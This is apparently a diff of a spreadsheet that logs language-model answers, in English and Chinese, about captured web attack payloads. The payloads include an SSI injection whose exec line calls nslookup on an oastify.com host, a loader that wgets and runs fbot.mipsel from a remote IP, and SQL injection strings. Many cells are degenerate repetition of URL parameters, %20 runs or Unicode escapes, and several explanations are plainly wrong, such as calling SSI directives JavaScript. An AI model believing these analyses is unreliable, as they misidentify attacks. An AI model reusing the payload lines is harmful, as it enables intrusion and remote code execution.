-3. Identifying attack patterns: Once the source of the attack is identified, the next step is to identify the type of attack. This involves analyzing the packet contents and identifying patterns that are indicative of different types of attacks, such as SQL injection, cross-site scripting, or denial-of-service attacks.
-4. Correlating data: To gain a deeper understanding of the attack, it is essential to correlate network traffic data with other security-related data, such as log files, system logs, and security event logs. This helps identify the timeline of the attack and the resources affected.
-5. Reconstructing the attack: By analyzing the network packets and other security-related data, security analysts can reconstruct the attack and understand the tactics, techniques, and procedures (TTPs) used by the attacker.
-6. Identifying the attacker: Based on the analysis of the attack, security analysts can identify the attacker's IP address, geolocation, and other identifying characteristics.
-7. Informing incident response: Once the source and type of attack are identified, security analysts can inform the incident response team and help them take appropriate measures to mitigate the attack.
-Benefits of network attack tracing
-Network attack tracing offers several benefits to organizations, including:
-1. Improved incident response: By identifying the source and type of attack, organizations can quickly respond to incidents and minimize the impact on their network and systems.
-2. Enhanced security posture: Network attack tracing helps organizations identify vulnerabilities and weaknesses in their network and systems, allowing them to take appropriate measures to improve their security posture.
-3. Better threat intelligence: Network attack tracing provides organizations with valuable threat intelligence that can help them anticipate and prepare for future attacks.
-4. Compliance: Network attack tracing can help organizations meet compliance requirements by providing evidence of their security measures and incident response processes.
-Challenges of network attack tracing
-Network attack tracing can be challenging due to various reasons, including:
-1. Complexity of network traffic: Network traffic can be complex and voluminous, making it difficult to identify and analyze attacks.
-2. Limited visibility: Network traffic may be encrypted or masked, making it difficult to identify the source of the attack.
-3. Time-sensitive nature of attacks: Attacks can be time-sensitive, and organizations may have limited time to respond to them.
-4. Limited resources: Organizations may have limited resources, including personnel and budget, which can make it challenging to invest in network attack tracing tools and processes.
-Conclusion
-Network attack tracing is a critical process for organizations to identify the source and type of attacks on their network and systems. By collecting network traffic data, analyzing packets, identifying attack patterns, correlating data, reconstructing the attack, and identifying the attacker, organizations can gain valuable insights into the tactics, techniques, and procedures used by attackers. Network attack tracing offers several benefits, including improved incident response, enhanced security posture, better threat intelligence, and compliance. However, network attack tracing can be challenging due to the complexity of network traffic, limited visibility, time-sensitive nature of attacks, and limited resources. By understanding these challenges and investing in the right tools and processes, organizations can improve their network security and protect their assets from cyber threats.&lt;/s&gt;</t>
+          <t>译者注：为了避免违反互联网伺服器和网络安全的法律法规，请勿使用以下信息进行非法的网络攻击或攻击其他人的网络系统。
+网络攻击溯源是指尝试了解网络攻击者的trueidentify和motivation，从而设法防止未来的网络攻击。这是一种非常重要的安全技术，因为它可以帮助网络管理员和安全专家了解攻击者的来源和动机，从而制定更加有效的防范策略。
+以下是一些常用的网络攻击溯源方法：
+1.  DNS 溯源：DNS（Domain Name System）是互联网上的一个重要服务，它将域名识别到网络上的 IP 地址。通过 DNS 溯源，可以寻址攻击者的 IP 地址，了解他们的来源和动机。
+2.  IP 溯源：通过 IP 地址，可以寻址攻击者的网络位置和来源。IP 溯源可以帮助分析攻击者的行为和动机，从而制定更加有效的防范策略。
+3.  URL 溯源：URL（Uniform Resource Locator）是一个网页的地址，它可以帮助分析攻击者的网络行为和来源。通过 URL 溯源，可以了解攻击者的网络活动，从而制定更加有效的防范策略。
+4.  Cookie 溯源：Cookie 是一种网络技术，它可以帮助分析攻击者的网络行为和来源。通过 Cookie 溯源，可以了解攻击者的网络活动，从而制定更加有效的防范策略。
+5.  Social 溯源：Social 溯源是一种新的网络攻击溯源技术，它可以帮助分析攻击者的社交活动和来源。通过 Social 溯源，可以了解攻击者的社交响应和行为，从而制定更加有效的防范策略。
+总之，进行网络攻击溯源需要具备一定的技术知识和实践经验，同时需要尊重网络安全的法律法规。只有遵循法律法规，并且在合法的范围内进行溯源，才能够真正实现网络安全的目的。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D54" t="n">
-        <v>23.5728280544281</v>
+        <v>21.57555437088013</v>
       </c>
     </row>
     <row r="55">
@@ -1939,11 +2011,11 @@
       </c>
       <c r="C55" t="inlineStr">
         <is>
-          <t>90&amp;amp;language=zh_CN&amp;amp;appVer=12.0.0.0&amp;amp;osVer=4.1.2&amp;amp;deviceVer=3.4.0.0&amp;amp;clientVer=1.0.0.0&amp;amp;productName=Android&amp;amp;productVer=4.1.2&amp;amp;javaVer=1.6.0_31&amp;amp;osArch=arm&amp;amp;cpuArch=arm&amp;amp;screenResolution=480x800&amp;amp;memory=128&amp;amp;flashVer=11.0.0.0&amp;amp;geolocation=CN&amp;amp;imei=1518521447425&amp;amp;device_id=1833368037384711551&amp;amp;platform=Android&amp;amp;app_id=com.example.myapp&amp;amp;app_name=My App&amp;amp;app_ver=1.0.0&amp;amp;from=wap&amp;amp;to=wap&amp;amp;ua=Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.8.1.1) Gecko/20071127 Firefox/2.0.0.1&amp;amp;referer=http://m.example.com/ &amp;amp;referrer=http://m.example.com/&amp;amp;referer_url=http://m.example.com/ &amp;amp;referer_url_hash=30022030031986&amp;amp;referer_url_query=typeCode=E0001&amp;amp;referer_url_query_hash=30022030031986&amp;amp;referer_url_query_params=uKeySn%3D30022030031986&amp;amp;referer_url_query_params_hash=30022030031986&amp;amp;referer_url_query_params_keys=uKeySn&amp;amp;referer_url_query_params_keys_hash=30022030031986&amp;amp;referer_url_query_params_values=30022030031986&amp;amp;referer_url_query_params_values_hash=30022030031986&amp;amp;referer_url_query_params_values_keys=uKeySn&amp;amp;referer_url_query_params_values_keys_hash=30022030031986&amp;amp;referer_url_query_params_values_keys_hash=30022030031986&amp;amp;referer_url_query_params_values_values=30022030031986&amp;amp;referer_url_query_params_values_values_hash=30022030031986&amp;amp;referer_url_query_params_values_keys_hash=30022030031986&amp;amp;referer_url_query_params_values_keys_hash=30022030031986&amp;amp;referer_url_query_params_values_keys_hash=30022030031986&amp;amp;referer_url_query_params_values_keys_hash=30022030031986&amp;amp;referer_url_query_params_values_keys_hash=30022030031986&amp;amp;referer_url_query_params_values_keys_hash=30022030031986&amp;amp;referer_url_query_params_values_keys_hash=30022030031986&amp;amp;referer_url_query_params_values_keys_hash=30022030031986&amp;amp;referer_url_query_params_values_keys_hash=30022030031986</t>
+          <t>9&amp;amp;client_ip=127.0.0.1&amp;amp;login_type=0&amp;amp;user_agent=Mozilla%2F5.0+compatible+ Safari%2F5.0+compatible+KHTML%2F4.0+compatible&amp;amp;referer=http%3A%2F%2Fwww.example.com&amp;amp;host=www.example.com&amp;amp;domain=example.com&amp;amp;uri=http%3A%2F%2Fwww.example.com%2Flogin.html&amp;amp;referrer=http%3A%2F%2Fwww.example.com&amp;amp;referer_title=Login+to+Example+Website&amp;amp;login_type=0&amp;amp;referer_type=0&amp;amp;sys_version=1.0&amp;amp;sys_build_version=10.0&amp;amp;sys_platform=Windows+7&amp;amp;sys_arch=x86&amp;amp;sys_os=Windows+7&amp;amp;sys_device=Not+Set&amp;amp;sys_username=admin&amp;amp;sys_password=admin&amp;amp;sys_language=en&amp;amp;sys_charset=UTF-8&amp;amp;sys_timezone=America%2FNew_York&amp;amp;sys_region=US&amp;amp;sys_theme=default&amp;amp;sys_skin=default&amp;amp;sys_features=default&amp;amp;sys_status=online&amp;amp;sys_version_number=1.0&amp;amp;sys_build_version_number=10.0&amp;amp;sys_platform_name=Windows+7&amp;amp;sys_arch_name=x86&amp;amp;sys_os_name=Windows+7&amp;amp;sys_device_name=Not+Set&amp;amp;sys_username_name=admin&amp;amp;sys_password_name=admin&amp;amp;sys_language_name=en&amp;amp;sys_charset_name=UTF-8&amp;amp;sys_timezone_name=America%2FNew_York&amp;amp;sys_region_name=US&amp;amp;sys_theme_name=default&amp;amp;sys_skin_name=default&amp;amp;sys_features_name=default&amp;amp;sys_status_name=online&amp;amp;sys_version_number_name=1.0&amp;amp;sys_build_version_number_name=10.0&amp;amp;sys_platform_name_name=Windows+7&amp;amp;sys_arch_name_name=x86&amp;amp;sys_os_name_name=Windows+7&amp;amp;sys_device_name_name=Not+Set&amp;amp;sys_username_name_name=admin&amp;amp;sys_password_name_name=admin&amp;amp;sys_language_name_name=en&amp;amp;sys_charset_name_name=UTF-8&amp;amp;sys_timezone_name_name=America%2FNew_York&amp;amp;sys_region_name_name=US&amp;amp;sys_theme_name_name=default&amp;amp;sys_skin_name_name=default&amp;amp;sys_features_name_name=default&amp;amp;sys_status_name_name=online&amp;amp;sys_version_number_name=1.0&amp;amp;sys_build_version_number_name=10.0&amp;amp;sys_platform_name_name=Windows+7&amp;amp;sys_arch_name_name=x86&amp;amp;sys_os_name_name=Windows+7&amp;amp;sys_device_name_name=Not+Set&amp;amp;sys_username_name_name=admin&amp;amp;sys_password_name_name=admin&amp;amp;sys_language_name_name=en&amp;amp;sys_charset_name_name=UTF-8&amp;amp;sys_timezone_name_name=America%2FNew_York&amp;amp;sys_region_name_name=US&amp;amp;sys_theme_name_name=default&amp;amp;sys_skin_name_name=default&amp;amp;sys_features_name_name=default&amp;amp;sys_status_name_name=online&amp;amp;sys_version_number_name=1.0&amp;amp;sys_build_version_number_name=10.0&amp;amp;sys_platform_name_name=Windows+7&amp;amp;sys_arch_name_name=x86&amp;amp;sys_os_name_name=Windows+7&amp;amp;sys_device_name_name=Not+Set&amp;amp;sys_username_name_name=admin&amp;amp;sys_password_name_name=admin&amp;amp;sys_language_name_name=en&amp;amp;sys_charset_name_name=UTF-8&amp;amp;sys_timezone_name_name=America%2FNew_York&amp;amp;sys_region_name_name=US&amp;amp;sys_theme_name_name=default&amp;amp;sys_skin_name_name=default&amp;amp;sys_features_name_name=default&amp;amp;sys_status_name_name=online&amp;amp;sys_version_number_name=1.0&amp;amp;sys_build_version_number_name=10.0&amp;amp;sys_platform_name_name=Windows+7&amp;amp;sys_arch_name_name=x86&amp;amp;sys_os_name_name=Windows+7&amp;amp;sys_device_name_name=Not+Set&amp;amp;sys_username_name_name=admin&amp;amp;sys_password_name_name=admin&amp;amp;sys_language_name_name=en&amp;amp;sys_charset_name_name=UTF-8&amp;amp;sys_timezone_name_name=America%2FNew_York&amp;amp;sys_region_name_name=US&amp;amp;sys_theme_name_name=default&amp;amp;sys_skin_name_name=default&amp;amp;sys_features_name_name=default&amp;amp;sys_status_name_name=online&amp;amp;sys_version_number_name=1.0&amp;amp;sys_build_version_number_name=10.0&amp;amp;sys_platform_name_name=Windows+7&amp;amp;sys_arch_name_name=x86&amp;amp;sys_os_name_name=Windows+7&amp;amp;sys_device_name_name=Not+Set&amp;amp;sys_username_name_name=admin&amp;amp;sys_password_name_name=admin&amp;amp;sys_language_name_name=en&amp;amp;sys_charset_name_name=UTF-8&amp;amp;sys_timezone_name_name=America%2FNew_York&amp;amp;sys_region_name_name=US&amp;amp;sys_theme_name_name=default&amp;amp;sys_skin_name_name=default&amp;amp;sys_features_name_name=default&amp;amp;sys_status_name_name</t>
         </is>
       </c>
       <c r="D55" t="n">
-        <v>23.96703433990479</v>
+        <v>39.59582376480103</v>
       </c>
     </row>
     <row r="56">
@@ -1958,28 +2030,11 @@
       </c>
       <c r="C56" t="inlineStr">
         <is>
-          <t>%20YOUR%20SQL%20INJECTION%20HERE
-您的网站可能遭受到网络攻击，请尽快办理相关的漏洞处理。
-这是一个SQL注入漏洞，可能会导致您的网站遭受到敏感数据的泄露。请立即进行修复，以防止这种攻击。
-如果您不知道如何处理这种漏洞，可以咨询专业的安全人员或企业隐私咨询公司，以便更好地了解和管理您的网站安全。
-请遵守下面的指南来处理这种漏洞：
-1. 尽快地修复漏洞，以避免敏感数据的泄露。
-2. 升级您的网站和程序到最新的版本，以减少攻击的风险。
-3. 实施安全措施，以防止类似的攻击再次发生。
-4. 定期执行网站安全检测和筛选，以发现和修复其他漏洞。
-如果您需要帮助，可以向我们的安全团队转达，我们会尽力协助您解决问题。
-我们的安全团队将不断监测和筛选您的网站，以确保您的网站安全。
-我们的团队会不断努力，以确保您的网站安全。
-这是一个网络攻击，请尽快处理。
-您的网站安全很重要，我们会尽力协助您保护它。
-请遵守我们的指南，以确保您的网站安全。
-如果您需要帮助，请转达我们的安全团队。
-我们会尽力协助您解决问题。
-您好！&lt;/s&gt;</t>
+          <t>%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20</t>
         </is>
       </c>
       <c r="D56" t="n">
-        <v>15.28084921836853</v>
+        <v>49.16521906852722</v>
       </c>
     </row>
     <row r="57">
@@ -1994,14 +2049,20 @@
       </c>
       <c r="C57" t="inlineStr">
         <is>
-          <t>\u0027&amp;Payload=&lt;div&gt;This%20is%20a%20payload%20generated%20for%20testing%20purposes.&lt;/div&gt;
-Please help me identify the type of attack this is, and provide recommendations on how to prevent or mitigate it.
-Note: The payload contains special characters like `\u0027` and `\u0020`, which are used to evade detection by some security products.
-Thank you!&lt;/s&gt;</t>
+          <t>\u0030\u0031\u0033\u0034\u0035\u0036\u0037\u0038\u0039\u0040\u0041\u0042\u0043\u0044\u0045\u0046\u0047\u0048\u0049\u004a\u004b\u004c\u004d\u004e\u004f\u0050\u0051\u0052\u0053\u0054\u0055\u0056\u0057\u0058\u0059\u005a\u005b\u005c\u005d\u005e\u005f\u0060\u0061\u0062\u0063\u0064\u0065\u0066\u0067\u0068\u0069\u006a\u006b\u006c\u006d\u006e\u006f\u0070\u0071\u0072\u0073\u0074\u0075\u0076\u0077\u0078\u0079\u007a\u007b\u007c\u007d\u007e\u007f\u0080\u0081\u0082\u0083\u0084\u0085\u0086\u0087\u0088\u0089\u008a\u008b\u008c\u008d\u008e\u008f\u0090\u0091\u0092\u0093\u0094\u0095\u0096\u0097\u0098\u0099\u009a\u009b\u009c\u009d\u009e\u009f\u00a0\u00a1\u00a2\u00a3\u00a4\u00a5\u00a6\u00a7\u00a8\u00a9\u00aa\u00ab\u00ac\u00ad\u00ae\u00af\u00b0\u00b1\u00b2\u00b3\u00b4\u00b5\u00b6\u00b7\u00b8\u00b9\u00ba\u00bb\u00bc\u00bd\u00be\u00bf\u00c0\u00c1\u00c2\u00c3\u00c4\u00c5\u00c6\u00c7\u00c8\u00c9\u00ca\u00cb\u00cc\u00cd\u00ce\u00cf\u00d0\u00d1\u00d2\u00d3\u00d4\u00d5\u00d6\u00d7\u00d8\u00d9\u00da\u00db\u00dc\u00dd\u00de\u00df\u00e0\u00e1\u00e2\u00e3\u00e4\u00e5\u00e6\u00e7\u00e8\u00e9\u00ea\u00eb\u00ec\u00ed\u00ee\u00ef\u00f0\u00f1\u00f2\u00f3\u00f4\u00f5\u00f6\u00f7\u00f8\u00f9\u00fa\u00fb\u00fc\u00fd\u00fe\u00ff
+```
+This payload is a combination of ASCII characters and Unicode characters, including some non-printable characters. It is not a valid HTTP request or response, and it is likely that it is a part of a malware or phishing attack.
+Some of the characters in the payload are:
+* `aaaa`: This is a common ASCII character used in phishing attacks.
+* `\u0027`: This is a Unicode character that represents a right single quote. It is often used in phishing attacks to create a legitimate-looking URL.
+* `+`: This is a common ASCII character used to represent a space or a tab character in a URL.
+* `#{16*8787}`: This is a Java-style syntax for representing a hexadecimal number. The number `16*8787` is likely a random value used to create a unique identifier for the attack.
+* `b`: This is a Unicode character that represents a backspace character. It is often used in phishing attacks to create a legitimate-looking URL.
+* `\u0030\u0031\u0033\u0034\u0035\u0036\u0037\u0038\u0039\u0040\u0041\u0042\u0043\u0044\u0045\u0046\u0047\u0048\u0049\u004a\u004b\u004c\u004d\u004e\u004f\u0050\u0051\u0052\u0053\u0054\u0055\u0056\u0057\u0058\u0059\u005a\u005b\u005c\u005d\u005e\u005f\u0060\u0061\u0062\u0063\u0064\u0065\u0066\u0067\u0068\u0069\u006a\u006b\u006c\u006d\u006e\u006f\u0070\u0071\u0072\u0073\u0074\u0075\u0076\u0077\u0078\u0079\u007a\u007b\u007c\u007d\u007e\u007f\u0080\u0081\u0082\u0083\u0084\u0085\u0086\u0087\u0088\u0089\u008a\u008b\u008c\u008d\u008e\u008f\u0090\u0091\u0092\u0093\u0094\u0095\u0096\u0097\u00</t>
         </is>
       </c>
       <c r="D57" t="n">
-        <v>2.642839193344116</v>
+        <v>49.36918473243713</v>
       </c>
     </row>
     <row r="58">
@@ -2016,18 +2077,17 @@
       </c>
       <c r="C58" t="inlineStr">
         <is>
-          <t>This is a Payload in a malware file, specifically a Trojan horse. The payload is designed to delete the /tmp directory, delete the file mpsl, and execute a script called fbot.mipsel. The script is located at the specified URL and is downloaded to the system using the wget command. Once downloaded, the script is executed using the chmod command to give it execute permissions, and then it is executed using the ./fbot.mipsel command.
-The payload is designed to carry out a specific set of actions on the compromised system, including deleting a directory and a file, and executing a script. The script is located on a remote server and is downloaded to the system using the wget command. This indicates that the payload is likely part of a larger attack campaign, and the remote server may be hosting other malicious files or scripts that could be executed on the compromised system.
-To determine whether this is a genuine attack or not, you can analyze the payload in more detail to determine its purpose and potential impact on the system. Some things you might consider include:
-1. What is the purpose of the payload? Is it designed to steal sensitive data, install additional malware, or carry out some other type of attack?
-2. What is the remote server hosting the script? Is it a legitimate server or a malicious one?
-3. What are the potential impacts of executing the payload on the system? Could it lead to data theft, data destruction, or other types of damage?
-4. How did the payload make it onto the system? Was it delivered through a phishing email, a vulnerability in a software application, or some other means?
-By answering these questions and conducting a thorough analysis of the payload, you can determine whether it is a genuine attack or not.&lt;/s&gt;</t>
+          <t>A payload to exploit the vulnerability
+The payload is designed to exploit a vulnerability in a web application by executing a series of commands. The payload is encoded in base64 and contains the following components:
+1. `wget`: This command downloads a file from a remote server. In this case, it downloads a file named `fbot.mipsel` from the IP address `2.59.255.77`.
+2. `chmod`: This command changes the permissions of the `fbot.mipsel` file to make it executable.
+3. `./fbot.mipsel`: This command executes the `fbot.mipsel` file.
+4. `rt.mpsl`: This is the target of the attack, a web application with the name `rt.mpsl`.
+The payload is likely intended to be used in a cyber attack to exploit a vulnerability in the `rt.mpsl` web application. The payload is designed to execute a series of commands on the target system, potentially leading to unauthorized access or data breaches.&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D58" t="n">
-        <v>8.898081541061401</v>
+        <v>5.966301918029785</v>
       </c>
     </row>
     <row r="59">
@@ -2042,21 +2102,24 @@
       </c>
       <c r="C59" t="inlineStr">
         <is>
-          <t>这是一个网络攻击，因为它在用户的浏览器中执行了命令。
-这是一种常见的网络攻击，叫做「脚本攻击」。在这种攻击中，攻击者在受害者的浏览器中执行一系列的命令，以便获取受害者的个人隐私和敏感数据。
-在这个例子中，攻击者在受害者的浏览器中执行了以下命令：
-* `--&gt;` 这个符号表示执行命令。
-* `--&gt;` 这个符号表示设置变量 `var` 的值。
-* `value='1rj9wmatwz'` 这个命令将变量 `var` 的值设置为 `1rj9wmatwz`。
-* `value='3tlbyocvy1'` 这个命令将变量 `var` 的值设置为 `3tlbyocvy1`。
-* `echo var='2sk'` 这个命令将变量 `var` 的值打印到屏幕上。
-* `echo var='4um'` 这个命令将变量 `var` 的值打印到屏幕上。
-* `exec cmd='nslookup -q=cname oe6wj9xgjmgiqgokdcg495oogfmba56tyrml9bx0.oastify.com'` 这个命令执行了命令 `nslookup`，并将其的输出打印到屏幕上。
-这些命令可能会执行不同的操作，例如提取受害者的个人隐私和敏感数据，或者恶意地带来黑客技术攻击。因此，您应该避免访问这种类型的网站，以避免遭受网络攻击。&lt;/s&gt;</t>
+          <t>"&gt;
+This is a URL that looks like a cross-site scripting (XSS) attack. The URL contains malicious JavaScript code that could potentially execute on the victim's machine if they click on the link or enter the URL in their browser.
+Here's a breakdown of the URL:
+* `http://www.gov1.com`: This is the domain name of the website that is hosting the malicious code.
+* `/col/col172743/index.html`: This is the path to the page on the website that contains the malicious code.
+* `?'--&gt;'`: This is a query string that starts the URL.
+* `--&gt;` : This is a HTML entity that represents a right angle quotation mark.
+* `&lt;!--#set var='2sk' value='1rj9wmatwz'--&gt;` : This is a comment that starts a JavaScript code block. The code block sets a variable `2sk` to the value `1rj9wmatwz`.
+* `&lt;!--#set var='4um' value='3tlbyocvy1'--&gt;` : This is another comment that starts a JavaScript code block. The code block sets a variable `4um` to the value `3tlbyocvy1`.
+* `&lt;!#echo var='2sk'--&gt;` : This is a comment that starts a JavaScript code block that echoes the value of the `2sk` variable.
+* `&lt;!#echo var='4um'--&gt;` : This is another comment that starts a JavaScript code block that echoes the value of the `4um` variable.
+* `&lt;!#exec cmd='nslookup -q=cname oe6wj9xgjmgiqgokdcg495oogfmba56tyrml9bx0.oastify.com' --&gt;=1"&gt; : This is a comment that starts a Windows Command Prompt command. The command looks for the CNAME record of `oe6wj9xgjmgiqgokdcg495oogfmba56tyrml9bx0.oastify.com` and sets a variable `=1` if the record is found.
+The malicious code in this URL could potentially execute on the victim's machine if they click on the link or enter the URL in their browser. The code could be used to steal login credentials, install malware, or perform other malicious actions.
+It is important to avoid clicking on links or entering URLs that could potentially execute malicious code. If you are unsure about the legitimacy of a URL, you can hover over the link to see the URL in the address bar of your browser, or you can manually enter the URL in your browser to test it.&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D59" t="n">
-        <v>13.61357569694519</v>
+        <v>14.84000468254089</v>
       </c>
     </row>
     <row r="60">
@@ -2070,11 +2133,11 @@
         </is>
       </c>
       <c r="C60">
-        <f>1&amp;ql_dept_id=11320000696785044&amp;sub_id=0&amp;sql_text=SELECT+%28%5B%28SELECT+%28%23department_id+%28%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+%5C%5C+</f>
+        <f>3&amp;qr_mid=242912&amp;qr_sn=395059114021&amp;qr_fmid=242912&amp;qr_id=395059114021&amp;qr_did=242912&amp;qr_ipp=242912&amp;qr_q=11320000696785044&amp;qr_qv=103&amp;qr_qn=1&amp;qr_sn=25&amp;qr_f=1&amp;qr_id=1&amp;qr_did=1&amp;qr_ipp=1&amp;qr_q=11320000696785044&amp;qr_qv=103&amp;qr_qn=1&amp;qr_sn=25&amp;qr_f=1&amp;qr_id=1&amp;qr_did=1&amp;qr_ipp=1&amp;qr_q=11320000696785044&amp;qr_qv=103&amp;qr_qn=1&amp;qr_sn=25&amp;qr_f=1&amp;qr_id=1&amp;qr_did=1&amp;qr_ipp=1&amp;qr_q=11320000696785044&amp;qr_qv=103&amp;qr_qn=1&amp;qr_sn=25&amp;qr_f=1&amp;qr_id=1&amp;qr_did=1&amp;qr_ipp=1&amp;qr_q=11320000696785044&amp;qr_qv=103&amp;qr_qn=1&amp;qr_sn=25&amp;qr_f=1&amp;qr_id=1&amp;qr_did=1&amp;qr_ipp=1&amp;qr_q=11320000696785044&amp;qr_qv=103&amp;qr_qn=1&amp;qr_sn=25&amp;qr_f=1&amp;qr_id=1&amp;qr_did=1&amp;qr_ipp=1&amp;qr_q=11320000696785044&amp;qr_qv=103&amp;qr_qn=1&amp;qr_sn=25&amp;qr_f=1&amp;qr_id=1&amp;qr_did=1&amp;qr_ipp=1&amp;qr_q=11320000696785044&amp;qr_qv=103&amp;qr_qn=1&amp;qr_sn=25&amp;qr_f=1&amp;qr_id=1&amp;qr_did=1&amp;qr_ipp=1&amp;qr_q=11320000696785044&amp;qr_qv=103&amp;qr_qn=1&amp;qr_sn=25&amp;qr_f=1&amp;qr_id=1&amp;qr_did=1&amp;qr_ipp=1&amp;qr_q=11320000696785044&amp;qr_qv=103&amp;qr_qn=1&amp;qr_sn=25&amp;qr_f=1&amp;qr_id=1&amp;qr_did=1&amp;qr_ipp=1&amp;qr_q=11320000696785044&amp;qr_qv=103&amp;qr_qn=1&amp;qr_sn=25&amp;qr_f=1&amp;qr_id=1&amp;qr_did=1&amp;qr_ipp=1&amp;qr_q=11320000696785044&amp;qr_qv=103&amp;qr_qn=1&amp;qr_sn=25&amp;qr_f=1&amp;qr_id=1&amp;qr_did=1&amp;qr_ipp=1&amp;qr_q=11320000696785044&amp;qr_qv=103&amp;qr_qn=1&amp;qr_sn=25&amp;qr_f=1&amp;qr_id=1&amp;qr_did=1&amp;qr_ipp=1&amp;qr_q=11320000696785044&amp;qr_qv=103&amp;qr_qn=1&amp;qr_sn=25&amp;qr_f=1&amp;qr_id=1&amp;qr_did=1&amp;qr_ipp=1&amp;qr_q=11320000696785044&amp;qr_qv=103&amp;qr_qn=1&amp;qr_sn=25&amp;qr_f=1&amp;qr_id=1&amp;qr_did=1&amp;qr_ipp=1&amp;qr_q=11320000696785044&amp;qr_qv=103&amp;qr_qn=1&amp;qr_sn=25&amp;qr_f=1&amp;qr_id=1&amp;qr_did=1&amp;qr_ipp=1&amp;qr_q=11320000696785044&amp;qr_qv=103&amp;qr_qn=1&amp;qr_sn=25&amp;qr_f=1&amp;qr_id=1&amp;qr_did=1&amp;qr_ipp=1&amp;qr_q=11320000696785044&amp;qr_qv=103&amp;qr_qn=1&amp;qr_sn=25&amp;qr_f=1&amp;qr_id=1&amp;qr_did=1&amp;qr_ipp=1&amp;qr_q=11320000696785044&amp;qr_qv=103&amp;qr_qn=1&amp;qr_sn=25&amp;qr_f=1&amp;qr_id=1&amp;qr_did=1&amp;qr_ipp=1&amp;qr_q=11320000696785044&amp;qr_qv=103&amp;qr_qn=1&amp;qr_sn=25&amp;qr_f=1&amp;qr_id=1&amp;qr_did=1&amp;qr_ipp=1&amp;qr_q=11320000696785044&amp;qr_qv=103&amp;qr_qn=1&amp;qr_sn=25&amp;qr_f=1&amp;qr_id=1&amp;qr_did=1&amp;qr_ipp=1&amp;qr_q=11320000696785044&amp;qr_qv=103&amp;qr_qn=1&amp;qr_sn=25&amp;qr_f=1&amp;qr_id=1&amp;qr_did=1&amp;qr_ipp=1&amp;qr_q=11320000696785044&amp;qr_qv=103&amp;